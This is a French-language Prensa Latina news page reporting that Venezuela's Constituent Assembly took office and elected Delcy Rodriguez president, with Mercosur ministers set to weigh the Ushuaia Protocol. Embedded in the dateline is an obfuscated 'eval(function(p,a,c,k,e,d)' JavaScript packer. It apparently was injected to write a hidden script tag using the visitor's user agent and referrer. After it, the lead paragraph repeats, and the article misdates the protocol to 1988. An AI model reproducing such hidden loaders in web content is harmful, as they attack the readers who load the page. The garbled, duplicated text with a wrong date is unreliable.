mardi 23 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

L’Assemblée Nationale Constituante entre en fonction au Venezuela

Caracas, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bknbb|var|u0026u|referrer|edndd||js|php'.split('|'),0,{})) 4 août (PL) Après être entrée en fonction, l'Assemblée Nationale Constituante (ANC) du Venezuela a élu Delcy Rodriguez comme présidente lors de sa première séance au Palais Fédéral Législatif.

Caracas, 4 août (PL) Après être entrée en fonction, l’Assemblée Nationale Constituante (ANC) du Venezuela a élu Delcy Rodriguez comme présidente lors de sa première séance au Palais Fédéral Législatif.

Rodriguez a été Ministre des Relations Extérieures du Venezuela de décembre 2014 à juin 2017, Secrétaire de la Communication et de l’information de 2013 à 2014, et avait avant exercé, entre autres, les fonctions de Ministre du Bureau de la Présidence (2006) et de Vice-ministre des Relations Extérieures chargée de l’Europe.

Elle a assuré que les travaux du nouvel organe constitutionnel débuteront dès demain. Puis elle a prévenu les « violents, les fascistes, ceux qui mènent une guerre économique contre le peuple, » à ne pas être surpris par le fait que la justice se présente à eux car « le pouvoir constituant originaire est arrivé ».

« Nous ne sommes pas venus ici pour détruire la Constitution, nous sommes venus pour retirer du chemin tous les obstacles dictatoriaux imposés par la bourgeoisie, lesquels ont empêcher d’exercer la totalité de cette constitution. Nous sommes venus pour la défendre, l’approfondir, la rénover et la renforcer », s’est-elle exprimée.

Par ailleurs, les ministres des Affaires Extérieures du Brésil, d’Argentine, du Paraguay et de l’Uruguay se réuniront samedi pour  aborder l’application au Venezuela du Protocole d’Ushuaïa sur le Compromis Démocratique du Mercosur.

Ils devront évaluer la supposée absence « de mesures concrètes pour le retour de la normalité démocratique de la part du gouvernement vénézuélien, et la détérioration de la situation » dans ce pays.

Souscrit le 24 juillet 1988, ce protocole établit la dite Clause Démocratique qui détermine non seulement l’exclusion du bloc régional de la nation où (selon le jugement de l’organe) l’ordre démocratique est détruit, mais également l’application de sanctions commerciales et/ou la fermeture des frontières.
 
peo/mem/mfm/lma/mpm

EN CONTINU
notes connexes